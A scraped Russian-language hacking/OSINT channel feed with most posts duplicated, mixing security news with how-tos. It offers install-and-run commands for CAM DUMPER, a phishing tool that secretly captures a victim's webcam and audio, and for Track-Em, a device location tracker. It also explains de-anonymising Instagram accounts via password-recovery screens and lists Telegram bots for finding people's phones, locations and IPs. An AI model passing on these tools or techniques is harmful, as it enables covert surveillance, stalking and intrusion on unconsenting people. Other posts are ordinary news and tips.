Как определить близкое окружение цели по Instagram-аккаунту
Ещё в 1947-ом году аналитик ЦРУ Кен Шерман сообщил, что порядка 80% информации страна собирает из открытых источников, а ведь тогда даже не было интернета! И лишь оставшиеся 20% приходятся на профессиональную работу агентов и шпионов.
Вот такой вот современный «джеймс бонд», заключённый в поисковую строку интернета! Разведка по открытым источникам называется «OSINT». И послужить эта технология может не только государствам, но и простым смертным тоже — например, чтобы узнать о человеке больше.
STERRA в пару кликов собирает списки подписчиков и подписок в Instagram, а затем сверяет данные. Есть совпадение? Значит, этот пользователь однозначно больше, чем просто поклонник или наоборот кумир! Наш клиент! Списки, которые собирает STERRA, можно использовать дальше — они экспортируются в XLS, CSV и JSON. Помимо юзернейма пользователей, сервис собирает общую информацию: количество подписчиков и подписок, имя, количество постов, bio.
Пробивай, веселись ✌️
Ещё в 1947-ом году аналитик ЦРУ Кен Шерман сообщил, что порядка 80% информации страна собирает из открытых источников, а ведь тогда даже не было интернета! И лишь оставшиеся 20% приходятся на профессиональную работу агентов и шпионов.
Вот такой вот современный «джеймс бонд», заключённый в поисковую строку интернета! Разведка по открытым источникам называется «OSINT». И послужить эта технология может не только государствам, но и простым смертным тоже — например, чтобы узнать о человеке больше.
STERRA в пару кликов собирает списки подписчиков и подписок в Instagram, а затем сверяет данные. Есть совпадение? Значит, этот пользователь однозначно больше, чем просто поклонник или наоборот кумир! Наш клиент! Списки, которые собирает STERRA, можно использовать дальше — они экспортируются в XLS, CSV и JSON. Помимо юзернейма пользователей, сервис собирает общую информацию: количество подписчиков и подписок, имя, количество постов, bio.
Пробивай, веселись ✌️
Как узнать кто смотрит ваши истории в Instagram с фейка
В очередной раз заметив, что ваши истории просматривает незаполненный Instagram-профиль, становится любопытно, кто же за ним скрывается. Это может оказаться как случайный посетитель, так и прячущийся знакомый, которого запросто можно рассекретить.
Чтобы определить, кто просматривает истории с поддельного аккаунта, нужно нажать по своему логину в Instagram и выбрать «
При поочередном нажатии, вы узнаете первую и две последних цифры номера телефона, а так же первую и последнюю букву привязанной почты, на которую отправляется письмо восстановления доступа. Зная эти данные, вы сможете сверить ее со своей телефонной книгой и определить, кто же из знакомых использует дополнительный аккаунт.
В очередной раз заметив, что ваши истории просматривает незаполненный Instagram-профиль, становится любопытно, кто же за ним скрывается. Это может оказаться как случайный посетитель, так и прячущийся знакомый, которого запросто можно рассекретить.
Чтобы определить, кто просматривает истории с поддельного аккаунта, нужно нажать по своему логину в Instagram и выбрать «
Добавить аккаунт
», затем «Войти в существующий аккаунт
», а после «Переключить аккаунты
». В следующем окне выбираем «Получить помощь со входом в систему
» и вводим логин подозрительного профиля. Кликаем по каждому из пунктов: «Отправить электронное письмо
» и «Отправить SMS
».При поочередном нажатии, вы узнаете первую и две последних цифры номера телефона, а так же первую и последнюю букву привязанной почты, на которую отправляется письмо восстановления доступа. Зная эти данные, вы сможете сверить ее со своей телефонной книгой и определить, кто же из знакомых использует дополнительный аккаунт.
Wayback Keyword Search
Новый инструмент для сохранения контента с Wayback Machine и последующего поиска по скачанному контенту.
Выбираете нужный домен, а затем вводите ключевое слово, а инструмент выведет полученные результаты на экран.
Новый инструмент для сохранения контента с Wayback Machine и последующего поиска по скачанному контенту.
Выбираете нужный домен, а затем вводите ключевое слово, а инструмент выведет полученные результаты на экран.
Как удобно подбирать шрифты
Подбирать шрифты в дизайне — тоже самое, что сочетать ингредиенты в еде. Если шрифты несовместимы, то клиенту, вероятнее всего, станет плохо. Чтобы просто и наглядно оценить, как разные шрифты сочетаются между собой, мы нашли один интересный сайт.
René — нейросеть в виде сайта, которая «играет» с шрифтами за вас. Её создатель – Джон Голд, разработчик из Airbnb и TheGrid.
Нейросеть помогает дизайнерам и разработчикам сэкономить время при составлении подборки шрифтов для разных проектов.
Интерфейс довольно-таки прост и интуитивно понятен человеку, который сталкивался со шрифтами хотя бы пару раз в жизни.
Справа расположена панель инструментов, на которой можно выбрать нужный тег, тип, семейство шрифта, размер, толщину. При внесении правок сайт для быстрого сравнения добавляет блок рядом с новыми параметрами.
Подбирать шрифты в дизайне — тоже самое, что сочетать ингредиенты в еде. Если шрифты несовместимы, то клиенту, вероятнее всего, станет плохо. Чтобы просто и наглядно оценить, как разные шрифты сочетаются между собой, мы нашли один интересный сайт.
René — нейросеть в виде сайта, которая «играет» с шрифтами за вас. Её создатель – Джон Голд, разработчик из Airbnb и TheGrid.
Нейросеть помогает дизайнерам и разработчикам сэкономить время при составлении подборки шрифтов для разных проектов.
Интерфейс довольно-таки прост и интуитивно понятен человеку, который сталкивался со шрифтами хотя бы пару раз в жизни.
Справа расположена панель инструментов, на которой можно выбрать нужный тег, тип, семейство шрифта, размер, толщину. При внесении правок сайт для быстрого сравнения добавляет блок рядом с новыми параметрами.
Взламываем веб-камеру с помощью фишинговой атаки
CAM DUMPER — утилита, которая делает снимок с веб-камеры жертвы при переходе по вредоносной ссылке.
Мы уже публиковали несколько схожих инструментов, тем не менее у CAM DUMPER есть ряд преимуществ — вредоносная страница имеет протокол HTTPS, так же присутствует возможность записывать видео и звук.
Установка
$
Строго в ознакомительных целях ✌️
CAM DUMPER — утилита, которая делает снимок с веб-камеры жертвы при переходе по вредоносной ссылке.
Мы уже публиковали несколько схожих инструментов, тем не менее у CAM DUMPER есть ряд преимуществ — вредоносная страница имеет протокол HTTPS, так же присутствует возможность записывать видео и звук.
Установка
$
apt update && apt upgrade
$ apt install git php wget curl jq
$ git clone https://github.com/LiNuX-Mallu/CAM-DUMPER.git
$ cd CAM-DUMPER
$ chmod +x camdumper.sh
$ ./camdumper.sh
Разработчик так же рекомендует установить Material Files, для удобного управления захваченными целями.Строго в ознакомительных целях ✌️
Как проверить, не читают ли ваши переписки?
Сегодня про способ, который поможет опровергнуть или подтвердить мысли о том, читает ли кто-то ваши переписки. В основе метода лежит сервис privnote.com, который создаёт самоуничтожающие записки. Но у сервиса также есть функция оповещения о прочтении. Она и будет выступать капканом.
Создаем заметку с любым текстом. Нажимаем на кнопку «Показать параметры», выставляем галочку на пункте «Не спрашивать подтверждение перед тем, как показать и уничтожить записку», указываем почту на которую придёт уведомление и нажимаем «Создать записку».
Полученную ссылку можно укоротить через любой сервис, а затем раскидать по перепискам, заметкам и т.д. Если кто-то по ней перейдет, то вам на почту придёт оповещение. Однако, в случае с перепиской, собеседника нужно будет предупредить по другим каналам связи.
Сегодня про способ, который поможет опровергнуть или подтвердить мысли о том, читает ли кто-то ваши переписки. В основе метода лежит сервис privnote.com, который создаёт самоуничтожающие записки. Но у сервиса также есть функция оповещения о прочтении. Она и будет выступать капканом.
Создаем заметку с любым текстом. Нажимаем на кнопку «Показать параметры», выставляем галочку на пункте «Не спрашивать подтверждение перед тем, как показать и уничтожить записку», указываем почту на которую придёт уведомление и нажимаем «Создать записку».
Полученную ссылку можно укоротить через любой сервис, а затем раскидать по перепискам, заметкам и т.д. Если кто-то по ней перейдет, то вам на почту придёт оповещение. Однако, в случае с перепиской, собеседника нужно будет предупредить по другим каналам связи.
Отслеживаем геолокацию устройств
Track-Em —- инструмент для отслеживания местоположения Android или Ios или любых других устройств, поддерживающих геолокацию. Чтобы узнать больше об API геолокации, нажмите здесь
Установка
$
$
Track-Em —- инструмент для отслеживания местоположения Android или Ios или любых других устройств, поддерживающих геолокацию. Чтобы узнать больше об API геолокации, нажмите здесь
Установка
$
apt update && apt upgrade
$ apt install git python
$ git clone https://github.com/LiNuX-Mallu/Track-Em.git
$ cd Track-Em
$ pip install -r requirements.txt
Запуск$
python track.py
Как запретить программе доступ к интернету в Windows
Нет ничего страшного в том, что программы используют трафик и ресурсы компьютера для выполнения определенных задач, однако некоторые из них просто вынуждают ограничить доступ к интернету, постоянно напоминая об необходимости установки обновлений, показывая рекламные баннеры или даже собирая конфиденциальную информацию.
Для ограничения доступа определенной программы к интернету в целом или выбранных сетях, вовсе не обязательно использовать дополнительные утилиты, ведь это можно осуществить с помощью стандартных средств системы.
Открываем Брандмауэр, зажав сочетание клавиш «
Нет ничего страшного в том, что программы используют трафик и ресурсы компьютера для выполнения определенных задач, однако некоторые из них просто вынуждают ограничить доступ к интернету, постоянно напоминая об необходимости установки обновлений, показывая рекламные баннеры или даже собирая конфиденциальную информацию.
Для ограничения доступа определенной программы к интернету в целом или выбранных сетях, вовсе не обязательно использовать дополнительные утилиты, ведь это можно осуществить с помощью стандартных средств системы.
Открываем Брандмауэр, зажав сочетание клавиш «
Win + R
» и введя команду «firewall.cpl
». Переходим в «Дополнительные параметры
», а затем «Правила для исходящего подключения
». В правой части экрана нажимаем «Создать правило
», выбираем «Для программы
», указываем путь к программе, которой нужно ограничить интернет и устанавливаем галочку на «Блокировать подключение
».Как запустить Linux прямо в браузере
Наверное многие пользователи Windows задумывались о переходе на Linux, однако останавливались из-за опасений и непонимания еще неизведанной ими операционной системы. И это правильный подход к познанию нового — прежде, чем установить Linux, нужно ознакомиться с его возможностями.
Для того чтобы полноценно ознакомиться с системой, можно воспользоваться помощью сервиса OnWorks, который является поставщиком облачных вычислений, где вы сможете запускать множество рабочих станций и управлять ими прямо в браузере.
На выбор доступны такие популярные дистрибутивы, как Debian, Zorin OS, Mageia, Ubuntu и другие. Больше информации об операционной системе можно узнать, если нажать на «
Наверное многие пользователи Windows задумывались о переходе на Linux, однако останавливались из-за опасений и непонимания еще неизведанной ими операционной системы. И это правильный подход к познанию нового — прежде, чем установить Linux, нужно ознакомиться с его возможностями.
Для того чтобы полноценно ознакомиться с системой, можно воспользоваться помощью сервиса OnWorks, который является поставщиком облачных вычислений, где вы сможете запускать множество рабочих станций и управлять ими прямо в браузере.
На выбор доступны такие популярные дистрибутивы, как Debian, Zorin OS, Mageia, Ubuntu и другие. Больше информации об операционной системе можно узнать, если нажать на «
READ MORE
», а для запуска необходимо выбрать интересующую сборку и кликнуть «RUN ONLINE
». Затем нажать «Start
», подождать загрузки и снова выбрать «Enter
».Сканируем историю транзакций по адресу Bitcoin-кошелька
Orbit — это инструмент для расследования блокчейн-транзакций. Он предназначен для изучения сети блокчейн-кошелька путем рекурсивного сканирования истории транзакций. Данные отображаются в виде графика.
Установка
$
$
Orbit — это инструмент для расследования блокчейн-транзакций. Он предназначен для изучения сети блокчейн-кошелька путем рекурсивного сканирования истории транзакций. Данные отображаются в виде графика.
Установка
$
git clone https://github.com/s0md3v/Orbit
$ cd Orbit
Использование$
python3 orbit.py -s
(btc адрес)Пользуемся инструментом для скана портов и поиска уязвимостей
nrich — новый инструмент командной строки от разработчиков Shodan для быстрого анализа списка IP-адресов и просмотра того, какие из них имеют открытые порты/уязвимости.
Установка
$
$
$
Далее пользуемся списком команд исходя из описания
nrich — новый инструмент командной строки от разработчиков Shodan для быстрого анализа списка IP-адресов и просмотра того, какие из них имеют открытые порты/уязвимости.
Установка
$
wget https://gitlab.com/api/v4/projects/33695681/packages/generic/nrich/latest/nrich_latest_amd64.deb
$ sudo dpkg -i nrich_latest_amd64.deb
Для того, что бы убедится в том, что он работает, можно написать команду echo
и адрес. К примеру:$
echo 149.202.182.140 | nrich -
Далее мы видим результат: 149.202.182.140 (ftptech1.pcsoft.fr)
Ports: 21, 80, 111, 443
CPEs: cpe:/a:proftpd:proftpd:1.3.5b, cpe:/a:apache:http_server:2.4.25
Vulnerabilities: CVE-2018-11763, CVE-2019-0220, CVE-2017-15710, CVE-2018-1312, CVE-2019-0197, CVE-2017-9798, CVE-2018-1283, CVE-2017-7668, CVE-2017-3169, CVE-2017-15715, CVE-2017-7659, CVE-2018-1333, CVE-2019-0211, CVE-2019-12815, CVE-2017-3167, CVE-2017-9788, CVE-2019-0196, CVE-2017-7679, CVE-2018-17199
Использование$
nrich --help
Далее пользуемся списком команд исходя из описания
Подборка OSINT-инструментов для Telegram:
├@userinfobot (Find ID)
├@CheckID_AIDbot (Find ID)
├@username_to_id_bot (Find ID)
├checker (Checker)
├t.me/+79000000000 (Checker)
├@TgAnalyst_bot (Find Phone)
├eyeofgod (Find Phone)
├@anonimov_bot (Find Phone)
├@maigret_osint_bot (Find Nickname)
├whatsmyname (Find Nickname)
├mail (Find Name)
├search4faces (Find Photo)
├findclone (Find Photo)
├yandex (Find Photo)
├@telesint_bot (Find Chats)
├@tgscanrobot (Find Chats)
├TelegramScraper (Chats Parser)
├TeleParser (Chats Parser)
├TG-Parser (Chats Parser)
├tg-archive (Chat Export)
├commentgram (Find Messages)
├telegago (Find Messages)
├@locatortlrm_bot (Check Location)
├telegram-nearby (Check Location)
├@FindStickerCreatorBot (Sticker Author)
├canarytokens (Check IP)
└iplogger (Check IP)
P.S. Инструкция по исследованию Telegram-каналов. Установление привязанного телефона при помощи ботов. Сервис для создания ботов-ловушек Dnnme2.
@rtdream
├@userinfobot (Find ID)
├@CheckID_AIDbot (Find ID)
├@username_to_id_bot (Find ID)
├checker (Checker)
├t.me/+79000000000 (Checker)
├@TgAnalyst_bot (Find Phone)
├eyeofgod (Find Phone)
├@anonimov_bot (Find Phone)
├@maigret_osint_bot (Find Nickname)
├whatsmyname (Find Nickname)
├mail (Find Name)
├search4faces (Find Photo)
├findclone (Find Photo)
├yandex (Find Photo)
├@telesint_bot (Find Chats)
├@tgscanrobot (Find Chats)
├TelegramScraper (Chats Parser)
├TeleParser (Chats Parser)
├TG-Parser (Chats Parser)
├tg-archive (Chat Export)
├commentgram (Find Messages)
├telegago (Find Messages)
├@locatortlrm_bot (Check Location)
├telegram-nearby (Check Location)
├@FindStickerCreatorBot (Sticker Author)
├canarytokens (Check IP)
└iplogger (Check IP)
P.S. Инструкция по исследованию Telegram-каналов. Установление привязанного телефона при помощи ботов. Сервис для создания ботов-ловушек Dnnme2.
@rtdream
Уязвимость Demonic (CVE-2022-32969) позволяет раскрыть секретную фразу восстановления криптокошелька. Уязвимость вызвана способностью веб-браузеров сохранять содержимое полей ввода в рамках системы «восстановления сеанса». Так, Google Chrome и Mozilla Firefox будут кэшировать данные, введенные в текстовые поля (кроме полей пароля), чтобы браузер мог восстановить данные после сбоя с помощью функции «Восстановить сеанс». Поскольку расширения браузерного кошелька, такие как Metamask, Phantom и Brave, используют поле ввода, не обозначенное как поле пароля, когда пользователь вводит свою фразу восстановления, она сохраняется на диске в виде обычного текста. Злоумышленник или вредоносное ПО, имеющие доступ к компьютеру, могут украсть сид-фразу и импортировать кошелек на свои устройства. Эта атака потребует физической кражи компьютера, получения удаленного доступа или компрометации его с помощью троянской программы удаленного доступа, что нередко встречается в целенаправленных и постоянных атаках.
Браузеры хранят все пароли в открытом виде
По словам исследователей, веб-браузер может хранить конфиденциальные и учетные данные, а также cookie файлы в виде открытого текста в памяти. Недостаток содержится в браузерах на базе Chromium, в том числе Google Chrome , Microsoft Edge , Brave и Mozilla Firefox.
Для извлечения данных достаточно удаленного доступа. Извлечение может быть выполнено из любого процесса без повышенных прав. Можно «загрузить в память все пароли, которые хранятся в диспетчере паролей». Даже двухфакторная аутентификация не защитит учетные записи пользователя, если в памяти присутствуют cookie данные. Извлечение данных может привести к перехвату сеанса.
Есть несколько типов учетных данных в открытом виде, которые можно извлечь из памяти браузера:
📌 Имя пользователя + пароль, используемые при входе в веб-приложение;
📌 URL + имя пользователя + пароль автоматически загружаются в память при запуске браузера и хранятся в данных для входа;
📌 Все cookie файлы, принадлежащие определенному веб-приложению (включая сеансовые cookie файлы)
Google отметила эту проблему как «неисправляемая», так как Chromium не может исправить проблемы, связанные с атаками, которые требуют физический локальный доступ.
По словам исследователей, веб-браузер может хранить конфиденциальные и учетные данные, а также cookie файлы в виде открытого текста в памяти. Недостаток содержится в браузерах на базе Chromium, в том числе Google Chrome , Microsoft Edge , Brave и Mozilla Firefox.
Для извлечения данных достаточно удаленного доступа. Извлечение может быть выполнено из любого процесса без повышенных прав. Можно «загрузить в память все пароли, которые хранятся в диспетчере паролей». Даже двухфакторная аутентификация не защитит учетные записи пользователя, если в памяти присутствуют cookie данные. Извлечение данных может привести к перехвату сеанса.
Есть несколько типов учетных данных в открытом виде, которые можно извлечь из памяти браузера:
📌 Имя пользователя + пароль, используемые при входе в веб-приложение;
📌 URL + имя пользователя + пароль автоматически загружаются в память при запуске браузера и хранятся в данных для входа;
📌 Все cookie файлы, принадлежащие определенному веб-приложению (включая сеансовые cookie файлы)
Google отметила эту проблему как «неисправляемая», так как Chromium не может исправить проблемы, связанные с атаками, которые требуют физический локальный доступ.
В России готовятся ограничить работу ещё семи VPN-сервисов
Такой вывод следует из письма ЦБ, направленного российским банкам. Данную информацию также подтвердил топ-менеджер одной из кредитных организаций. ЦБ просит российские банки предоставить до 11 июля в Роскомнадзор список используемых ими VPN-сервисов «с целью исключения их из политик ограничения доступа».
В список VPN-сервисов, которые могут попасть под ограничение входят: VPN Proxy Master, Browsec VPN, VPN-Super Unlimited Proxy, Melon VPN, Windscribe VPN, VPN RedCat Secure Unlimited и Proton VPN.
Такой вывод следует из письма ЦБ, направленного российским банкам. Данную информацию также подтвердил топ-менеджер одной из кредитных организаций. ЦБ просит российские банки предоставить до 11 июля в Роскомнадзор список используемых ими VPN-сервисов «с целью исключения их из политик ограничения доступа».
В список VPN-сервисов, которые могут попасть под ограничение входят: VPN Proxy Master, Browsec VPN, VPN-Super Unlimited Proxy, Melon VPN, Windscribe VPN, VPN RedCat Secure Unlimited и Proton VPN.
В сеть утекла база пользователей портала tutu. ru
Эксперты DLBI рассказали, что в открытый доступ выложен файл с данными покупателей билетов на автобус сервиса Tutu. ru.
В файле TutuBusorders содержатся 2 627 166 строк с данными:
- фамилия и имя;
- номер телефона (2,29 млн уникальных номеров);
- адрес электронной почты (2,018 млн уникальных адресов).
Хакеры утверждают, что смогли получить доступ к трем таблицам. Одну он выложил в открытый доступ, другие включают в себя: таблицу зарегистрированных пользователей с их id в системе (23 млн строк, но там только 16 млн с указанной электронной почтой и 7 млн строк с хешами паролей) и таблицу на 32 млн строк с заказами билетов. В последней базе, якобы, есть ФИО, даты рожения, паспортные данные и id пользователей, которые можно сопоставить со второй таблицей.
Тот же самый источник ранее выкладывал базы данных пользователей GeekBrains и "Школы управления Сколково".
В Tutu. ru в курсе ситуации, там проводят расследование факта утечки. Они опубликовали пояснение на Хабре про утечку 👇🏻
Эксперты DLBI рассказали, что в открытый доступ выложен файл с данными покупателей билетов на автобус сервиса Tutu. ru.
В файле TutuBusorders содержатся 2 627 166 строк с данными:
- фамилия и имя;
- номер телефона (2,29 млн уникальных номеров);
- адрес электронной почты (2,018 млн уникальных адресов).
Хакеры утверждают, что смогли получить доступ к трем таблицам. Одну он выложил в открытый доступ, другие включают в себя: таблицу зарегистрированных пользователей с их id в системе (23 млн строк, но там только 16 млн с указанной электронной почтой и 7 млн строк с хешами паролей) и таблицу на 32 млн строк с заказами билетов. В последней базе, якобы, есть ФИО, даты рожения, паспортные данные и id пользователей, которые можно сопоставить со второй таблицей.
Тот же самый источник ранее выкладывал базы данных пользователей GeekBrains и "Школы управления Сколково".
В Tutu. ru в курсе ситуации, там проводят расследование факта утечки. Они опубликовали пояснение на Хабре про утечку 👇🏻
Сотрудник HackerOne продавал отчеты белых хакеров об ошибках и уязвимостях компаниям-разработчикам ПО
Сотрудник HackerOne украл отчеты об уязвимостях, отправленные через платформу Bug Bounty, и получил денежное вознаграждение у клиентов платформы. HackerOne — это bug bounty платформа, соединяющая бизнес и исследователей безопасности.
Как дело было раскрыто: HackerOne ответила на запрос клиента о расследовании уязвимости через канал связи вне платформы от пользователя под ником «rzlr». Клиент заметил, что такая же проблема безопасности ранее была отправлена через HackerOne.
Расследование HackerOne установило, что один из ее сотрудников имел доступ к платформе с 4 апреля по 23 июня, и связался с семью компаниями, чтобы сообщить об уязвимостях, уже обнаруженных в системе.
Сотрудник HackerOne украл отчеты об уязвимостях, отправленные через платформу Bug Bounty, и получил денежное вознаграждение у клиентов платформы. HackerOne — это bug bounty платформа, соединяющая бизнес и исследователей безопасности.
Как дело было раскрыто: HackerOne ответила на запрос клиента о расследовании уязвимости через канал связи вне платформы от пользователя под ником «rzlr». Клиент заметил, что такая же проблема безопасности ранее была отправлена через HackerOne.
Расследование HackerOne установило, что один из ее сотрудников имел доступ к платформе с 4 апреля по 23 июня, и связался с семью компаниями, чтобы сообщить об уязвимостях, уже обнаруженных в системе.
Вредонос AstraLocker прекратил работу
Операторы вымогателя AstraLocker объявили, что вредонос прекращает свою работу и загрузили на VirusTotal инструменты для дешифровки данных. Издание Bleeping Computer подтверждает, что дешифраторы настоящие и в самом деле помогают расшифровать пострадавшие файлы. Также журналистам удалось получить комментарий от одного из операторов вредоноса:
«Было весело, но веселье всегда заканчивается. Я закрываю все операции, дешифраторы в ZIP-файлах, чистые. Я вернусь. На данный момент я завязал с программами-вымогателями и собираюсь заняться криптоджекингом, лол».
Неожиданное прекращение работы AstraLocker может быть связано с опубликованными отчетами ИБ-экспертов, которые изучили вредонос. Это могло привлечь к AstraLocker внимание правоохранительных органов.
Операторы вымогателя AstraLocker объявили, что вредонос прекращает свою работу и загрузили на VirusTotal инструменты для дешифровки данных. Издание Bleeping Computer подтверждает, что дешифраторы настоящие и в самом деле помогают расшифровать пострадавшие файлы. Также журналистам удалось получить комментарий от одного из операторов вредоноса:
«Было весело, но веселье всегда заканчивается. Я закрываю все операции, дешифраторы в ZIP-файлах, чистые. Я вернусь. На данный момент я завязал с программами-вымогателями и собираюсь заняться криптоджекингом, лол».
Неожиданное прекращение работы AstraLocker может быть связано с опубликованными отчетами ИБ-экспертов, которые изучили вредонос. Это могло привлечь к AstraLocker внимание правоохранительных органов.
Шифровальщик Hive окончательно перешел на Rust и стал опаснее
Специалисты Microsoft Threat Intelligence Center назвали Hive одним из самых быстро развивающихся семейств вымогательского ПО. Перейдя на Rust, вредонос получил несколько преимуществ:
- Безопасность по памяти, типам данных и потокам;
- Многопоточность;
- Устойчивость к реверс-инжинирингу;
- Полный контроль над низкоуровневыми ресурсами;
- Широкий выбор криптографических библиотек.
Специалисты Microsoft Threat Intelligence Center назвали Hive одним из самых быстро развивающихся семейств вымогательского ПО. Перейдя на Rust, вредонос получил несколько преимуществ:
- Безопасность по памяти, типам данных и потокам;
- Многопоточность;
- Устойчивость к реверс-инжинирингу;
- Полный контроль над низкоуровневыми ресурсами;
- Широкий выбор криптографических библиотек.